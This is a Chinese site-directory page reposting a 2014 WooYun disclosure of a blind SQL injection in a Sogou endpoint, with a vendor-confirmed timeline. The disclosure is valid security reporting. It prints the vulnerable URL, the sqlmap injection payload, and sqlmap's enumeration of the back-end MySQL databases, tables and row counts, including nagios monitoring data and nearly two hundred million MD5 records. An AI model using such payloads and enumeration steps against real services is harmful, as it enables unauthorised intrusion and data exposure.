网站目录收录网站方式:1.人工手动审核。2.自助审核(你的网站在权重3、PR4以上,挂上本站友链->点击友链->自动审核通过。)
北京 天津 上海 广东 深圳 河北 河南 新疆 重庆 四川 贵州 湖南 湖北 云南 广西 宁夏 青海 甘肃 陕西
西藏 海南 山东 福建 安徽 浙江 吉林 山西 江西 江苏 辽宁 黑龙 内蒙 澳门 香港 台湾 日本 韩国 美国
当前位置:站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细 订阅RssFeed

[公开漏洞]搜狗某应用SQL注射(泄漏NagiOS等敏感信息)

来源:WooYun 浏览:848次 时间:2014-06-16
简介:搜狗某应用SQL注射(泄漏NagiOS等敏感信息) 相关厂商: 搜狗漏洞作者:超威蓝猫 提交时间:2014-05-02 13:21 公开时间:2014-06-16 13:22 漏洞类型:SQL注射漏洞危害等级:高 自评Rank:19 漏洞

搜狗某应用SQL注射(泄漏NagiOS等敏感信息) 相关厂商: 搜狗 漏洞作者:超威蓝猫 提交时间:2014-05-02 13:21 公开时间:2014-06-16 13:22 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:19 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: SQL注射 漏洞详情 披露状态:

2014-05-02:细节已通知厂商并且等待厂商处理中
2014-05-04:厂商已经确认,细节仅向厂商公开
2014-05-14:细节向核心白帽子及相关领域专家公开
2014-05-24:细节向普通白帽子公开
2014-06-03:细节向实习白帽子公开
2014-06-16:细节向公众公开

简要描述:

有一个库中有近2亿条MD5,不知道是什么东西..

详细说明:

安装最新版本的"搜狗高速浏览器",打开后使用Burp抓包,发现浏览器对如下地址发起了一次HTTP请求:

http://tb.sogou.com/insert.php?url=http%3a%2f%2fse.cdn.sogou.com%2fapk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB



01.jpg



其中,md5参数存在布尔型盲注。

--count了一下发现nagios的库,应该是可以进一步渗透的。p4p库中有近两亿条MD5,不知道是什么东西..

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: md5
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: url=http://se.cdn.sogou.com/apk_Install_2.2.0.12446.zip&md5=F918BF5773F2FC1569CC1974C1DF5742' AND 6498=6498 AND 'KOBd'='KOBd&size=2188000&mode=2&uid=2B754ADAC19E2444806FB84273D317CB
---
web application technology: Nginx, PHP 5.1.6
back-end DBMS: MySQL 5
available databases [10]:
[*] geoip
[*] information_schema
[*] ipmap
[*] mysql
[*] nagios
[*] p4p
[*] proxyservers
[*] pxpadmin
[*] server_status
[*] test

Database: geoip
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ip | 77947 |
| cc | 233 |
+---------------------------------------+---------+

Database: nagios
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| nagios_hostchecks | 209759 |
| nagios_timedevents | 55842 |
| nagios_servicechecks | 55703 |
| nagios_logentries | 4999 |
| nagios_systemcommands | 3623 |
| nagios_statehistory | 1248 |
| nagios_host_contacts | 732 |
| nagios_objects | 228 |
| nagios_contact_notificationcommands | 216 |
| nagios_timedeventqueue | 126 |
| nagios_hoststatus | 122 |
| nagios_service_contacts | 116 |
| nagios_configfilevariables | 97 |
| nagios_contactnotificationmethods | 56 |
| nagios_contactnotifications | 48 |
| nagios_services | 36 |
| nagios_servicestatus | 36 |
| nagios_commands | 29 |
| nagios_flappinghistory | 26 |
| nagios_timeperiod_timeranges | 24 |
| nagios_processevents | 22 |
| nagios_contacts | 18 |
| nagios_contactstatus | 18 |
| nagios_runtimevariables | 18 |
| nagios_contactgroup_members | 16 |
| nagios_commenthistory | 13 |
| nagios_contact_addresses | 8 |
| nagios_contactgroups | 8 |
| nagios_notifications | 8 |
| nagios_timeperiods | 4 |
| nagios_conninfo | 3 |
| nagios_configfiles | 1 |
| nagios_dbversion | 1 |
| nagios_instances | 1 |
| nagios_programstatus | 1 |
+---------------------------------------+---------+

Database: proxyservers
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| proxy | 325 |
+---------------------------------------+---------+

Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 850 |
| help_topic | 484 |
| help_keyword | 404 |
| `user` | 74 |
| db | 37 |
| help_category | 36 |
| tables_priv | 23 |
| columns_priv | 6 |
+---------------------------------------+---------+

Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mysql_mon | 331986 |
| checksums | 19413 |
+---------------------------------------+---------+

Database: ipmap
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ipmap | 189618 |
+---------------------------------------+---------+

Database: server_status
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mixer | 22386964 |
| mmsclient | 21797795 |
| castingflux | 6431398 |
| other | 591353 |
| tracker | 68015 |
| mixererror | 10073 |
| mmsclienterror | 10029 |
| castingerror | 2732 |
| othererror | 2724 |
| trackererror | 1322 |
| message | 566 |
+---------------------------------------+---------+

Database: pxpadmin
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| server | 349 |
| castingserv | 327 |
| CS_cur | 324 |
| resource | 120 |
| channel | 116 |
| idc | 19 |
| contacts | 16 |
| platform | 16 |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1239 |
| USER_PRIVILEGES | 451 |
| SCHEMA_PRIVILEGES | 438 |
| STATISTICS | 288 |
| KEY_COLUMN_USAGE | 269 |
| TABLE_PRIVILEGES | 231 |
| TABLE_CONSTRAINTS | 143 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| TABLES | 124 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 10 |
| COLUMN_PRIVILEGES | 6 |
+---------------------------------------+---------+

Database: p4p
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| md5 | 183041418 |
| software | 73765030 |
| uid_list | 53470743 |
| deadlink | 9237028 |
| user_holding | 6508087 |
| movie | 3658157 |
+---------------------------------------+---------+

修复方案:

你们更专业:)

版权声明:转载请注明来源 超威蓝猫@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-04 16:45

厂商回复:

感谢支持!
欢迎到SGSRC提交搜狗漏洞,地址: http://

最新状态:

暂无


0

版权与免责声明:

凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;


本文地址:https://top.cnzzla.com/artinfo/1820.html

好玩的手游下载

猜你喜欢

推荐站点

  • 福州小程序开发福州小程序开发

    福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务,价格美丽,服务周到.一对一项目对接,不满意退全款!预约电话:13107632710 胡小春!福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。

    www.fzant.com
  • 世界时间网世界时间网

    世界时间网为您提供世界各地精准时间,北京时间校准器,标准时间,世界各地时间与北京时间对比,时间换算等,希望对您有所帮助。

    top.cnzzla.com/time
  • 科技镇科技镇

    科技镇 | 关注科技、娱乐、人文、生活!

    www.kejizhen.com
  • 心动网址导航心动网址导航

    心动网址导航精选了国内国外著名的网站、好玩的、好看的、有趣的国内国外网站以及实用的、优秀的国内国外网站,包括国外视频、国外购物、国外交友、国外新闻等多种类型 同时提供精品行业分类目录提交,让用户全方位了解国内国外互联网动态!

    xd00.com
  • 门户网址-优秀网站导航门户网址-优秀网站导航

    门户网址-优秀网站导航,精选网址导航,免费分类目录提交,实用酷站大全。

    top.mhwz.cn

最新优秀网站